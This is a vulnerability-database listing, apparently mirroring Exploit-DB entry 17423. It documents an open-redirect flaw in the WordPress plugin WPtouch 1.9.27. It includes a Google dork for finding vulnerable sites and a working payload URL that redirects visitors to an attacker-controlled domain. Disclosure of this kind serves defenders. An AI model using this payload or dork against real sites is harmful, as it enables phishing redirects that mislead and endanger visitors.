Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbMaKyOtOxEDB-ID:17423
HistoryJun 21, 2011 - 12:00 a.m.

WordPress Plugin WPtouch 1.9.27 - URL redirection

2011-06-2100:00:00
MaKyOtOx
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

JSON
Hello , that's a 0day on the must downloaded WordPress plugin.

# Exploit Title: 0-Day WPtouch WordPress Plugin 1.9.27 URL redirection
# Google Dork: intext:"Powered by Wordpress + WPtouch" (with iphone/android
User-Agent)
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoins)
# Date: 20/06/2011
# Software Link: http://wordpress.org/extend/plugins/wptouch/
# Version: 1.9.27 (not tested on previous versions)
# Tested on: WhatEver OS
# CVE : 0-Day

http://site.com/?wptouch_view=normal&wptouch_redirect=.attacker-site.com

# It would redirect to : http://site.com.attacker-site.com :)

AI Score

7.4

Confidence

Low

JSON